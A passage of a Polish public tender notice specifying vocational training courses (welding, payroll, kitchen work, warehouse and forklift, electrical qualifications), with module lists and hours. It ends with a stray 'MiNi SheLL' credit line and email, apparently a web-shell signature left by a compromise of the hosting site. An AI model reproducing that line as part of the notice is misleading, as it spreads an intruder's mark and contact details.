Dodatkowe wymagania: Każdy uczestnik szkolenia, który ukończy szkolenie powinien otrzymać zaświadczenie zgodnie z Rozdziałem 3 pkt 3.5 SIWZ, książkę spawacza oraz świadectwo egzaminu spawacza wydane przez Instytut Spawalnictwa w Gliwicach. Egzamin zostanie zorganizowany najpóźniej  w ostatnim dniu szkolenia. Wykonawca zapewni dla każdego uczestnika szkolenia na okres trwania                   szkolenia odzież ochronną (roboczą) tj. minimum: obuwie, fartuch, rękawice, okulary..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 40.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> zakres III:Pracownik ds. kadr i płac - 5 osób w I edycji,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czas realizacji: nie dłużej niż 6 tygodni. 
Program szkolenia: minimalna ilość godzin - 180, w tym minimum  145 godzin ćwiczeń. 
1. Program szkolenia powinien być dostosowany do standardów kompetencji zawodowych dla zawodu : specjalista do spraw kadr (kod zawodu: 242307) i pracownik obsługi płacowej (kod zawodu:431301) oraz musi zawierać następujące jednostki modułowe: 
1) organizowanie stanowiska pracy zgodnie z przepisami i zasadami BHP, ochrony ppoż, ergonomii 	oraz ochrony środowiska 
2) opracowywanie i aktualizowanie informacji o potrzebach kadrowych firmy oraz rekrutowanie                        	 i selekcjonowanie kandydatów do pracy ,
3) prowadzenie akt osobowych zgodnie z wymaganiami prawa pracy, ,
4) przygotowywanie dokumentów związanych z nawiązywaniem i rozwiązywaniem stosunku pracy, także na podstawie umów cywilnoprawnych oraz zmianami w warunkach pracy i płacy,
5) naliczanie wynagrodzeń pracowniczych oraz świadczeń z ubezpieczenia społecznego i zdrowotnego 
6) sporządzanie miesięcznych i rocznych deklaracji z tytułu ubezpieczeń społecznych i zdrowotnych 
2. Zgodnie z modułowym programem szkolenia zawodowego dla zawodu: księgowy, z zakresu: 
księgowy ds. płac i rozliczeń z ZUS (kod zawodu: 343201):  
1) wynagrodzenie za pracę - minimum 6 godzin  zawierająca następujące jednostki szkoleniowe:
- płaca - jej funkcje i zasady;
- elementy i składniki wynagrodzenia za pracę; 
- minimalne wynagrodzenie za pracę;
- systemy wynagrodzenia za pracę ; 
- wzorcowa lista płac;  
2) ochrona wynagrodzenia za pracę i obowiązki pracodawców - minimum 6 godzin  zawierająca na	stępujące jednostki szkoleniowe
- prawo do wynagrodzenia
- ochrona wynagrodzenia za pracę
- potrącenia z wynagrodzenia za pracę
- wgląd do dokumentacji płacowej
- rozliczenia publicznoprawne
-odpowiedzialność pracodawcy przy wypłacie wynagrodzeń
3) rozliczenie składek ZUS - minimum 6 godzin  zawierająca następujące jednostki szkoleniowe
   -dokumenty zgłoszeniowe, rozliczeniowe i płatnicze
      - zasady i tryb postępowania w sprawach rozliczenia składek 
- wypełnianie i przekazywanie dokumentów ubezpieczeniowych 
4) zasiłki z ubezpieczenia społecznego - minimum 6 godziny zawierająca następujące jednostki 	
    szkoleniowe
 - zasiłek chorobowy i opiekuńczy 
 - świadczenia rehabilitacyjne 
 - zasiłek macierzyński 
 - zasiłki rodzinne, pielęgnacyjne i wychowawcze 
5) kompletowanie wniosków o emerytury i renty oraz ustalenie kapitału początkowego - minimum
     6 godzin zawierająca następujące jednostki szkoleniowe
       - kapitał początkowy - jego istota i zadania 
        - wniosek ZUS do pracodawców w sprawie kapitału początkowego 
        - kompletowanie dokumentów do wniosku o ustalenie kapitału początkowego
        -ustalenie kapitału początkowego 
3.  jednostkę modułową: zagadnienia z zakresu kadr, w tym elementy związane z prawem pracy -        	minimum 20 godzin;
4.   jednostkę modułową: obsługa programu PŁATNIK- minimum 15 godzin;
5.   jednostkę modułową: obsługa programu SYMFONIA w zakresie kadr i płac - minimum 15 godzin.
Dodatkowe wymagania: Wykonawca zakupi dla każdego uczestnika szkolenia książkę z zakresu  kadr i płac..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> zakres IV:    Pomoc kuchenna - 10 osób w I edycji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czas realizacji: nie dłużej niż  6 tygodni. 
Program szkolenia: minimalna ilość godzin - 200, w tym minimum 170 godzin ćwiczeń, przy czym co najmniej 50% ćwiczeń powinno odbyć się na stanowisku pracy ( w jednostce żywienia zbiorowego). 
Program szkolenia musi zawierać:
1. modułowy program szkolenia zawodowego dla zawodu: kucharz, z zakresu: wykonywanie zadań                w kuchni pod nadzorem kucharza (kod zawodu: 512201) z następującymi jednostkami modułowymi: 
1) przestrzeganie przepisów bhp i ppoż. oraz wymogów higieniczno-sanitarnych:
-  czynniki szkodliwe dla zdrowia w zakładzie gastronomicznym;
- udzielanie pomocy doraźnej;
- przepisy ppoż w zakładach żywienia zbiorowego;
- higiena zakładów;
- higiena żywności;
- higiena w produkcji i transporcie
2) przygotowanie stanowiska pracy zgodnie z wymogami:
-  przygotowanie stanowiska pracy w kuchni;
- rozmieszczenie maszyn i urządzeń w zakładzie gastronomicznym;
- układ funkcjonalny zakładów gastronomicznych
3) czynności porządkowe w kuchni:
- prace porządkowe codzienne w kuchni;
- prace porządkowe okresowe w kuchni;
- techniki mycia naczyń i urządzeń kuchennych;
- usuwanie odpadów ;
- konserwacja maszyn i urządzeń
4) przechowywanie surowców i przygotowanie do obróbki wstępnej:
- konserwowanie żywności;
- przechowywanie żywności;
- zmiany zachodzące podczas obróbki wstępnej;
- obróbka wstępna ręczna;
-  obróbka wstępna mechaniczna;
5) obróbka wstępna jaj :
- ocena świeżości jaj przy wybijaniu;
- ocena świeżości jaj przy prześwietleniu;
- dezynfekcja jaj;
- klasyfikacja i znakowanie jaj;
- przechowywanie jaj
6) obróbka wstępna ryb:
	     - obróbka wstępna brudna;
	     - obróbka wstępna czysta;
      - ocena towaroznawcza ryb
7) obróbka wstępna jarzyn:
- obróbka wstępna jarzyn mechaniczna;
- obróbka wstępna grzybów - ręczna;
- obróbka warzyw i ziemniaków - ręczna;
- obróbka wstępna owoców - ręczna;
- przygotowalnia;
- przygotowanie surowca i sprzętu  do przeprowadzenia obróbki wstępnej
8) obróbka wstępna drobiu i dzikiego ptactwa:
- proces obróbki wstępnej i dzikiego ptactwa;
- ocena towaroznawcza drobiu
9) obróbka wstępna mięsa zwierząt rzeźnych i dziczyzny:obróbka wstępna mięsa
- rozbiór tusz mięsa zwierząt rzeźnych i dziczyzny;
- obróbka wstępna mięsa przeznaczonego do gotowania;
- obróbka wstępna mięsa przeznaczonego do smażenia;
- obróbka wstępna mięsa przeznaczonego  do duszenia i pieczenia;
- sporządzanie mięsnej masy mielonej;
- przechowywanie mięsa;
- wykorzystanie mięsa w technologii gastronomicznej;
- ocena towaroznawcza mięsa zwierząt rzeźnych i dziczyzny
10) obróbka wstępna podrobów:
- ocena towaroznawcza podrobów;
- proces obróbki wstępnej podrobów
11) przygotowanie surówek:
- przygotowanie produktów do surówek;
- sporządzanie surówek warzywnych;
- sporządzanie surówek owocowych;
- porcjowanie i dekorowanie surówek
12) obróbka termiczna produktów;
- obróbka termiczna;
- zmiany zachodzące podczas obróbki termicznej;
- cel przeprowadzania obróbki termicznej;
- przypraw do procesu obróbki termicznej
13) przygotowanie sałatek;
- przygotowanie produktów do sporządzania sałatek
- sporządzanie sałatek warzywnych;
- sporządzanie sałatek owocowych;
- porcjowanie i dekorowanie sałatek;
- sporządzanie sosów do sałatek
14) przygotowanie potraw mlecznych:
- sporządzanie napoi mlecznych;
- sporządzanie zup mlecznych;
- przygotowanie potraw z sera;
- ocena towaroznawcza przetworów mlecznych
15) obróbka termiczna jarzyn:
- przygotowanie produktu do obróbki termicznej
- obróbka termiczna - gotowanie;
- obróbka termiczna - smażenie;
- obróbka termiczna -  pieczenie;
- obróbka termiczna - duszenie;
- metody przeprowadzenia obróbki termicznej
16) przygotowanie potraw z kaszy:
- obróbka wstępna i cieplna kasz
- techniki przygotowania potraw z kaszy rozklejonej;
- techniki przygotowania potraw z kaszy półsypko i sypko;
- ocena towaroznawcza kasz
17) przygotowanie potraw z mąki:
- oprószanie i zagęszczanie potraw;
- sporządzanie ciasta wyrabianego w naczyniu;
- techniki przygotowania ciasta wyrabianego w  naczyniu;
- techniki przygotowania ciasta wyrabianego na stolnicy;
- techniki sporządzania potraw w cieście smażonym;
- techniki sporządzania potraw z ciasta mieszanego
18) przygotowanie potraw z jaj:
- sporządzanie potraw z jaj gotowanych;
- sporządzanie potraw z jaj smażonych  zapiekanych;
- przygotowanie potraw z jaj faszerowanych;
- przygotowanie bezów, omletów biszkoptowych i mus
19) sporządzanie zup i dodatków do zup:
- otrzymywanie wywarów do zup;
- sporządzanie zup z warzyw;
- sporządzanie zup z mięsa , drobiu lub dziczyzny;
- sporządzanie zup wykwintnych z ryb i darów morza;
- ekspedycja zup;
- ocena towaroznawcza zup
2. jednostkę modułową: obsługa kasy fiskalnej i terminali płatniczych- minimum  10 godzin,
3. jednostkę modułową: podstawowe zasady higieny- minimum 10 godzin.
Dodatkowe wymagania: Wykonawca zakupi  dla każdego uczestnika  książkę, której tematyka zgodna będzie z zakresem szkolenia oraz zapewni  na okres trwania szkolenia odzież ochronną (roboczą) tj. minimum: fartuch, czapkę kucharską i obuwie ochronne..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> zakres V: Magazynier z obsługą wózka jezdniowego i egzaminem UDT - 10 osób w I edycji,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czas realizacji: nie dłużej niż 6 tygodni. 
Program szkolenia: minimalna ilość godzin - 190, w tym minimum  90 godzin ćwiczeń.
Program szkolenia musi zawierać:
1. modułowy program szkolenia zawodowego dla zawodu: magazynier, z zakresu: praca w handlu                       hurtowym (kod zawodu: 413103) z następującymi jednostkami modułowymi: 
1) przepisy bhp i p.poż w magazynie - hurtowni- minimum 7 godzin, zawierająca następujące jednostki                	szkoleniowe:
- bezpieczeństwo i higiena pracy w jednostce handlowej;
- bhp przy transporcie ręcznym i mechanicznym; 
- bhp przy urządzeniach elektrycznych; 
- ochrona przeciwpożarowa; 
- udzielanie pierwszej pomocy na miejscu wypadku; 
- udzielanie pierwszej pomocy przy oparzeniach, odmrożeniach, zatruciach. 
2) odbiór towarów- minimum 18 godzin, zawierająca następujące jednostki szkoleniowe:
- odpowiedzialność materialna pracownika magazynowego;
- dokumentacja organizacji magazynu; 
- sposoby rozmieszczenia towarów w magazynie;
- proces magazynowy w magazynach kompletacyjnych;
- systemy kompletacji;
- znakowanie ładunków kodami kreskowymi;
- odbiór ilościowy i jakościowy;
- gospodarka opakowaniami w magazynach.
3) zasady poprawnego przechowywania towarów- minimum 13 godzin, zawierająca następujące                		 jednostki szkoleniowe:
- zasady właściwego przechowywania towarów;
-  instalacje w budynkach magazynowych; 
- urządzenia do składowania;
- magazynowe środki transportu;
- pomocnicze urządzenia magazynowe; 
- czynniki wpływające na przechowywanie towarów;
- zmiany zachodzące w przechowywanych towarach;
- szkodniki magazynowe;
- ubytki towarowe.
4) obsługa programu SUBIEKT  dla WINDOWS do prowadzenia gospodarki magazynowej - minimum 	30 godzin, zawierająca następujące jednostki szkoleniowe:
- konfiguracja programu;
- sporządzanie dokumentów zakupu, zamówień do dostawcy i rozliczanie zobowiązań finansowych;
- sporządzanie dokumentów sprzedaży, zamówień od klienta i rozliczanie należności finansowych; 
- sporządzanie dokumentów korygujących zakupu i sprzedaży; 
-sporządzanie dokumentów przyjęcia magazynowe, wydania magazynowe, przesunięcia                                       	między magazynowe;
- przeprowadzanie inwentaryzacji; 
- budowa i obsługa drukarki fiskalnej; 
- drukowanie raportów.
2. jednostkę modułową: obsługa kasy fiskalnej  i terminali płatniczych - minimum 10 godzin,
3. jednostkę modułową: podstawowe zasady higieny - minimum 10 godzin,
4. jednostkę modułową: obsługa wózków jezdniowych wraz z wymianą butli gazowych- minimum                 	67 godzin,
5. jednostkę modułową: nowoczesne techniki sprzedaży- minimum 10 godzin,
6.jednostkę modułową: obsługa programu SYMFONIA w zakresie gospodarki magazynowej 
- minimum 25 godzin.
Dodatkowe wymagania: Część szkolenia dotycząca obsługi wózka jezdniowego ma przygotować uczestników do samodzielnego prowadzenia i obsługi wózka w transporcie wewnątrzzakładowym oraz powinna być przeprowadzona w oparciu o program opracowany lub zatwierdzony przez jednostkę      organizacyjną wyznaczoną przez Ministra właściwego do spraw gospodarki zgodnie                                   z  Rozporządzeniem Ministra Gospodarki z dnia 10 maja 2002r. w sprawie bezpieczeństwa i higieny pracy przy użytkowaniu wózków jezdniowych z napędem silnikowym (Dz. U. Nr 70, poz. 650 z późn. zm) lub równoważny.
W ramach szkolenia Wykonawca zorganizuje i przeprowadzi egzamin przed Komisją Urzędu Dozoru                          Technicznego. Egzamin zostanie zorganizowany najpóźniej w ostatnim dniu szkolenia. Każdy uczestnik                    szkolenia powinien otrzymać zaświadczenie zgodnie z Rozdziałem 3 pkt 3. 5 SIWZ oraz zaświadczenie                    kwalifikacyjne wydane przez Urząd Dozoru Technicznego.
Wykonawca zakupi dla każdego uczestnika szkolenia książkę, której tematyka zgodna będzie                            z zakresem szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> zakres VI: Uprawnienia SEP do 1 kV - 5 osób w I edycji,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czas realizacji: nie dłużej niż 2 tygodnie.
Program szkolenia: minimalna ilość godzin- 60. Program szkolenia musi być zgodny z przepisami
rozporządzenia Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 28 kwietnia 2003r. w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją 
urządzeń, instalacji i sieci (Dz. U. Nr 89, poz. 828 z późn. zm.) i obwieszczenia Prezesa Rady Ministrów z dnia 02 lipca 2003r. o sprostowaniu błędów (Dz. U. Nr 129, poz. 1184) oraz rozporządzenia Ministra Gospodarki i Pracy z dnia 20 lipca 2005r. zmieniającego rozporządzenie w sprawie szczegółowych
zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń instalacji                  i sieci ( Dz. U. Nr 141, poz. 1189) oraz zawierać m.in.:
1) zasady budowy, działania oraz warunków technicznych obsługi urządzeń, instalacji i sieci,
2) zasady eksploatacji oraz instrukcji eksploatacji urządzeń, instalacji i sieci,
3) zasady i warunki wykonywania prac kontrolno - pomiarowych i montażowych,
4) zasady i wymagania bezpieczeństwa pracy i ochrony przeciwpożarowej oraz umiejętności 	udzielania pierwszej pomocy,
5) instrukcję postępowania w razie awarii, pożaru lub innego zagrożenia bezpieczeństwa obsługi urządzeń lub zagrożenia życia, zdrowia i środowiska.
Dodatkowe wymagania: Szkolenie powinno zakończyć się egzaminem zewnętrznym przed Komisją powołaną przez Urząd Regulacji Energetyki. Każdy uczestnik szkolenia powinien otrzymać zaświadczenie zgodnie z Rozdziałem 3 pkt 3.5 SIWZ oraz świadectwo kwalifikacyjne w grupie materiałowej G-1E zgodnie z wzorem świadectwa kwalifikacyjnego, stanowiącym załącznik do rozporządzenia Ministra Gospodarki i Pracy z dnia 20 lipca 2005r. zmieniającego rozporządzenie w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń instalacji i sieci (Dz. U. Nr 141 poz. 1189). Egzamin zostanie zorganizowany najpóźniej w ostatnim dniu szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 10.</li></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com